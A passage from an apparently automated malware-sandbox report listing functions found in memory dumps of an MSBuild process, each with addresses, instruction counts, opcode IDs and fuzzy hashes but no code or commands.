                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5bd92bfc8ecd88ed45d458256a64e45dc13a379be9d0f9e05eb1c33ad93618de
                                                              • Instruction ID: dd25b73a9615201779866a0bf04fad33203911974ab78ec7bea21fabbbd94698
                                                              • Opcode Fuzzy Hash: 5bd92bfc8ecd88ed45d458256a64e45dc13a379be9d0f9e05eb1c33ad93618de
                                                              • Instruction Fuzzy Hash: A1E1D330B00215CFDB59DBA8E594A6EBBF2EF88314F248565E916DB391CB34DC42CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01154A8E Relevance: .3, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4692faaced3fe96c3f57e7f911a9b3352e2eeb0e031b35c9acc94d865c120149
                                                              • Instruction ID: 72b3418ef2cc08ed7598381b4a7a7b2d1f3ec0177b2bcab91370f0ee4c2913ef
                                                              • Opcode Fuzzy Hash: 4692faaced3fe96c3f57e7f911a9b3352e2eeb0e031b35c9acc94d865c120149
                                                              • Instruction Fuzzy Hash: 0AB17D70E00209CFDB58CFA9D8917DDBBF2AF88314F148129D829E7694EB749885CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0115A6C8 Relevance: .1, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd4b40e86aa39674b18272e8d47df67887cf0b174c8ebd795f65b758aa4e4642
                                                              • Instruction ID: c3f4052264ee647f6648bb37a77b27cb2dff8e885eb2521e3c0c9f721837c983
                                                              • Opcode Fuzzy Hash: cd4b40e86aa39674b18272e8d47df67887cf0b174c8ebd795f65b758aa4e4642
                                                              • Instruction Fuzzy Hash: EF517B71A00204DFDB44CF69E984799FBB2FF88311F14C2AAE9189B396E770D945CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01156CD4 Relevance: .1, Instructions: 134COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1f04b0d1321caf23094022b50b49379f267e2d1dce51b4087a9e1c20a9d91f6e
                                                              • Instruction ID: d7c4e31888249882f8b57b0cfec43fa6e019714e9a72d0fb73d0a3d0c31c85b1
                                                              • Opcode Fuzzy Hash: 1f04b0d1321caf23094022b50b49379f267e2d1dce51b4087a9e1c20a9d91f6e
                                                              • Instruction Fuzzy Hash: 6E513370D00228CFDB58CFA9C889B9DBBB1FF48304F548529E869AB351D774A844CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01156CE0 Relevance: .1, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d39b158f71f635543509a38da728e85ea30c50abc9dd0867f21bb23fb372637
                                                              • Instruction ID: 872ab4aa1b054fe478b4b086a289a16af748ca1a2263ef589fe80bfe5231393e
                                                              • Opcode Fuzzy Hash: 5d39b158f71f635543509a38da728e85ea30c50abc9dd0867f21bb23fb372637
                                                              • Instruction Fuzzy Hash: E35133B4D00228CFDB58CFA9C885B9DBBB1FF48314F548529E829AB350DB74A844CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01151128 Relevance: .1, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b2cf5a67092ff5468fbb2110a6236dfbd4dade51894fe54ac940a964eab9cd91
                                                              • Instruction ID: 455a07e52c722097944239e99059846222c6ea5e5712e9e36871da1815825646
                                                              • Opcode Fuzzy Hash: b2cf5a67092ff5468fbb2110a6236dfbd4dade51894fe54ac940a964eab9cd91
                                                              • Instruction Fuzzy Hash: B251FF702112518FCB2AFF78FA989543FF1F77630D3148955E0488FA3EDA656A49CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01151138 Relevance: .1, Instructions: 112COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 99e2c4ba4be128da3fbf6cf1331a9dd426bc89bd59caa6e64078e6e32834f6e0
                                                              • Instruction ID: 49e2b1a0618071a8746fe040c32c0e7b188d687749c6940743150c43d54eac1b
                                                              • Opcode Fuzzy Hash: 99e2c4ba4be128da3fbf6cf1331a9dd426bc89bd59caa6e64078e6e32834f6e0
                                                              • Instruction Fuzzy Hash: 0551FC70211251CFCB2AFF78FA989543FF1F7B130D3548955E0488FA2EDA612A49CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01151111 Relevance: .1, Instructions: 105COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08317d050a8c4b689140f3ab3aca6dca4490879a6a1c7c80fe8b56cbe7737f5b
                                                              • Instruction ID: d5db42c4913429a698ee7d945f22b31e58c19378c5841853983d87da2e9a43fb
                                                              • Opcode Fuzzy Hash: 08317d050a8c4b689140f3ab3aca6dca4490879a6a1c7c80fe8b56cbe7737f5b
                                                              • Instruction Fuzzy Hash: B3410E70211251CFCB26EF78FA989543FF1F7B230D3548959D0488FA2EDB656A49CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0115DE6A Relevance: .1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 694a39a586cd0f13e37b6a41c8978fc21f689512ed69b1ef997fedb0a2dd636e
                                                              • Instruction ID: 7a9eb12594f8da785c6c5cd0368d10f93bc26ba7358a5b6663b4898ace4c9f6d
                                                              • Opcode Fuzzy Hash: 694a39a586cd0f13e37b6a41c8978fc21f689512ed69b1ef997fedb0a2dd636e
                                                              • Instruction Fuzzy Hash: DC315C75B00216EFD709DB68D890E3AB7A6BBC8304F14C155E5459B299CB36EC43CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 011526DC Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 27ae9eef4bd7ce0cb686ab2381ddc14a916514a20feda7052cb3a971adf4ab28
                                                              • Instruction ID: 4bca6a7ec8605708f269ec1a9ce2ebff6046f7504c67f054a60a92b3ac67e285
                                                              • Opcode Fuzzy Hash: 27ae9eef4bd7ce0cb686ab2381ddc14a916514a20feda7052cb3a971adf4ab28
                                                              • Instruction Fuzzy Hash: FD41FEB5D00349DFDB14CFA9C984ADEBFF1EF48314F248429E819AB254DB74A949CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 011526E8 Relevance: .1, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6f786c1ae8881e7ac6f1791f8c6146edc194be89c66db5eb857db91e2ee22669
                                                              • Instruction ID: df2609a9a34f4bf35f993e88e4488c5cad721ec26dbd7a61aa34f35180e57c7f
                                                              • Opcode Fuzzy Hash: 6f786c1ae8881e7ac6f1791f8c6146edc194be89c66db5eb857db91e2ee22669
                                                              • Instruction Fuzzy Hash: E541DCB1D00349DFDB14DFA9C984A9EBFF5EF48310F208429E819AB250DB75A945CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0115A068 Relevance: .1, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1f46d94b5f1da43fccb68fa67f868b25c0eb7d1fee55e66855ca293b2fefd701
                                                              • Instruction ID: 576d55d60e71def21069c97e262ee8cd04c2c34d2b1bf1cfb147a29bdcb8b1a7
                                                              • Opcode Fuzzy Hash: 1f46d94b5f1da43fccb68fa67f868b25c0eb7d1fee55e66855ca293b2fefd701
                                                              • Instruction Fuzzy Hash: CA31B430E00219DBDB59CFA8D45469EFBB2FF89304F14C61AE916AB385DB719845CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0115169F Relevance: .1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a97ccf1c8c2cc61bf1df103f67261c928bdf087feb7a2f9c6cb7ab79dd14632b
                                                              • Instruction ID: 203ceae63eaa8890d93ab2dc6dcd13d265cedde2eaaeac97bfb63a680a3545f3
                                                              • Opcode Fuzzy Hash: a97ccf1c8c2cc61bf1df103f67261c928bdf087feb7a2f9c6cb7ab79dd14632b
                                                              • Instruction Fuzzy Hash: A6212974600110AFDF67AB7CE88C7693791E75130DF044E61D45EC766AEB24D843CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0115A078 Relevance: .1, Instructions: 78COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a9d754be7fd0e9eb26e82e89437491dc0340c02245e63f38c7002716656cc299
                                                              • Instruction ID: 5eb6fe4e27dee89fe5dde71cff3627cf0a9e5670e35a621b5d1a5bec109334c0
                                                              • Opcode Fuzzy Hash: a9d754be7fd0e9eb26e82e89437491dc0340c02245e63f38c7002716656cc299
                                                              • Instruction Fuzzy Hash: 7421A230E00219DBDB59CFA8D49469EFBB2FF89304F10C61AE815EB345DB719842CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01151488 Relevance: .1, Instructions: 78COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3c6a2bf514d7e2b23b8ec8bd9f8baf8fa5bdf318b1406f43aa1367ff5cddf6d4
                                                              • Instruction ID: 5b08df73e8177e510b8849648e6cf5db6f8390caaa7ae4685550b5d4d524cee8
                                                              • Opcode Fuzzy Hash: 3c6a2bf514d7e2b23b8ec8bd9f8baf8fa5bdf318b1406f43aa1367ff5cddf6d4
                                                              • Instruction Fuzzy Hash: E321A431A00212DFDF6BABBC98503ADBBE1EB49315F15047AEC16E7341EB35C9428791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 011517C0 Relevance: .1, Instructions: 78COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d519b0c325a2abda144ea1970798cf4a4ef254e4cc1c9ea0e08bc4d289206007
                                                              • Instruction ID: 7d370573af66155e9636f5bfa53eaa948a1740f807be82559ccf5ce322acfef2
                                                              • Opcode Fuzzy Hash: d519b0c325a2abda144ea1970798cf4a4ef254e4cc1c9ea0e08bc4d289206007
                                                              • Instruction Fuzzy Hash: 11214535A01241AFCB63ABB8A8487AE3FA1EB85218F100865DC59C7341EB38C947CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01159F68 Relevance: .1, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 092f8da121b88bc5f94a14055f781c6913b3a0d0852954ca98011fce182aabab
                                                              • Instruction ID: e5a6723eec4e0c0a9c18e5b7241fd626aa055173b752024b68acedeab3b397de
                                                              • Opcode Fuzzy Hash: 092f8da121b88bc5f94a14055f781c6913b3a0d0852954ca98011fce182aabab
                                                              • Instruction Fuzzy Hash: 45219731E00209DBCF59CF64D4546DEBBB2AF89314F14861AEC16BB341DB709846CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0115A85A Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 285a238b8b816126d1a90abe23d4c6cf6374e86e38e610108025909e95c5f8df
                                                              • Instruction ID: 3f24412a996f14c43557b9ab816433797ba0150f5c5331afed67f52b9bc1e421
                                                              • Opcode Fuzzy Hash: 285a238b8b816126d1a90abe23d4c6cf6374e86e38e610108025909e95c5f8df
                                                              • Instruction Fuzzy Hash: 3C21F230B40115CFEB58CB7DD854BAE7BF6AF88714F118229E911EB3A1EB718D008B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01154F8A Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 29264ebfefc899d3514dd6dff8067043e4ecd18dc617776ca2058574dcdeab70
                                                              • Instruction ID: f1c1f8e34fb39d27bb6196355ad47754da5c24ec6b82c20e43653185c9090d41
                                                              • Opcode Fuzzy Hash: 29264ebfefc899d3514dd6dff8067043e4ecd18dc617776ca2058574dcdeab70
                                                              • Instruction Fuzzy Hash: D5218134700144CFDB99EB78C559AADBBF1EF49304F2044A8E806EB365DB369D06CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01151382 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4e07de73fb016dfa32469ad8244f2bc090fbdb8154b86f922916d90ffd5a2593
                                                              • Instruction ID: 3fe5913a72bb601a37a7a683b01fec15967c94af5682bbdff7d6723dce5f5ea5
                                                              • Opcode Fuzzy Hash: 4e07de73fb016dfa32469ad8244f2bc090fbdb8154b86f922916d90ffd5a2593
                                                              • Instruction Fuzzy Hash: C721C674A05240EFDBBB5B7CD85832C7F61EB02319F5008A6E857C7693DB29C886C741
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0102D030 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102340012.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_102d000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2533bcb1153e9173d08aad3a2d7ea64799fed48f87327aff3460bd1dd3225126
                                                              • Instruction ID: ddd0a8f9fbc8ccf10f612d384e6df8f277d7cfaa56b4d51567c5e3e5b94f30e9
                                                              • Opcode Fuzzy Hash: 2533bcb1153e9173d08aad3a2d7ea64799fed48f87327aff3460bd1dd3225126
                                                              • Instruction Fuzzy Hash: 75212571604200DFCB11DF98D9C0B26BBA5FB84314F24C6ADE98A4B262C33AD847CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01151878 Relevance: .1, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a839ae0e2067fb0fe24b25922d245eb98f19f79ee53ded211810edffc469c773
                                                              • Instruction ID: 684a92bcd38e240c40adc1c995a655200c08abbc06d943a06199a37dfd48b6d1
                                                              • Opcode Fuzzy Hash: a839ae0e2067fb0fe24b25922d245eb98f19f79ee53ded211810edffc469c773
                                                              • Instruction Fuzzy Hash: D6218E30B00245DFDFAAEB78C5557AD7BF2AF49208F200469D911EB361EB368D05CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01151888 Relevance: .1, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e93118dde3c81d9ae060f81a261e47905d63ca6ad9c340393884ff82c83ada16
                                                              • Instruction ID: 1339c15667b4087fdbc28015ac52f63ae1267f09cfe00a1bca5f49dc2fb00d79
                                                              • Opcode Fuzzy Hash: e93118dde3c81d9ae060f81a261e47905d63ca6ad9c340393884ff82c83ada16
                                                              • Instruction Fuzzy Hash: 63213D30B00205DFDFAAEB78C5557AE77F2AF49205F200469D915EB354EB369D40CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01159F78 Relevance: .1, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f6678aaccb64f8e308441de580169614e847ae3daed437ffe746f0ce3c7c8a17
                                                              • Instruction ID: 06c071e1af5b5002fbf950848de37fafa2c511ee7d4b2c3b61249bc35cdeac58
                                                              • Opcode Fuzzy Hash: f6678aaccb64f8e308441de580169614e847ae3daed437ffe746f0ce3c7c8a17
                                                              • Instruction Fuzzy Hash: 8B218330E00309DBDB59CF64D45469EF7B2AF89304F14861AEC25BB380DB70A846CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 011516B0 Relevance: .1, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7bdb2ee936cf1e273e83b9b7d4ec44903d1e4fae6d4ef0a9c4fe6933879afea0
                                                              • Instruction ID: 5ca94e9a9f117435c4c88b1199cd161d035afc27bac6c08b9705f7e85510c26c
                                                              • Opcode Fuzzy Hash: 7bdb2ee936cf1e273e83b9b7d4ec44903d1e4fae6d4ef0a9c4fe6933879afea0
                                                              • Instruction Fuzzy Hash: D321C674600111AFDB57E7BCE9487193796E75030DF104D21E40EC766AEF24D8828B91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01154F98 Relevance: .1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8db73cadfafdf35b414b032772286229385fb172743a38ea59a64a8cca141803
                                                              • Instruction ID: 7bf942f441918c848c0f072a6818c96ea018c0b6263dccda8ee46f652d51729f
                                                              • Opcode Fuzzy Hash: 8db73cadfafdf35b414b032772286229385fb172743a38ea59a64a8cca141803
                                                              • Instruction Fuzzy Hash: 2C211D34700204CFDB98EB78C559AADBBF6EF49304F104468E906EB365EB769D01CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01150838 Relevance: .1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 69a3c021b57425918c1bebd22a2284b0a235ff49289f8ab81bdb9eb20b802227
                                                              • Instruction ID: 364d6eed78d26ba7e07e667f71918267995718b21ff949fd1196cfd06db1c3a3
                                                              • Opcode Fuzzy Hash: 69a3c021b57425918c1bebd22a2284b0a235ff49289f8ab81bdb9eb20b802227
                                                              • Instruction Fuzzy Hash: 46110430E04300DFEFAA56F8941076D37A4EB4A314F14883AF826CB242DB65C8828BC2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01150848 Relevance: .1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: caf3d85b2e40f040ece3ef90600d6bfc27b2da1d9099c17a6fe40b878f494695
                                                              • Instruction ID: 19e3e277a7282b5fa5ea250227f1a8a099b1f04587c9c2df36fe3f5f7ae15fca
                                                              • Opcode Fuzzy Hash: caf3d85b2e40f040ece3ef90600d6bfc27b2da1d9099c17a6fe40b878f494695
                                                              • Instruction Fuzzy Hash: 0F119030F00204DFEFA95AF8D404B2D32A5EB49315F108939F82ADB252DB61CC818BC1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01151498 Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d2c8c3fd2a769868aea3182391434372eaf28b172c7b94df11a168d4868ca86
                                                              • Instruction ID: a9856eefe0c80250890edea28126a3ef82046827186c1fd0316cc290e00a717c
                                                              • Opcode Fuzzy Hash: 7d2c8c3fd2a769868aea3182391434372eaf28b172c7b94df11a168d4868ca86
                                                              • Instruction Fuzzy Hash: 6C014031A00215DFCFAAEFB884502AEBBF5EF49218B25047AEC15E7301E735D9418BE5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0102D02B Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102340012.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_102d000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                              • Instruction ID: 668d540619dd0c21b5a94ef5cfd9c8a14a99494d37911c45921441e6287cadaa
                                                              • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                              • Instruction Fuzzy Hash: 2B11BE75504280DFDB12CF54D5C4B15BBB2FB84314F24C6AAE8494B666C33AD84ACB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0115A6B8 Relevance: .1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
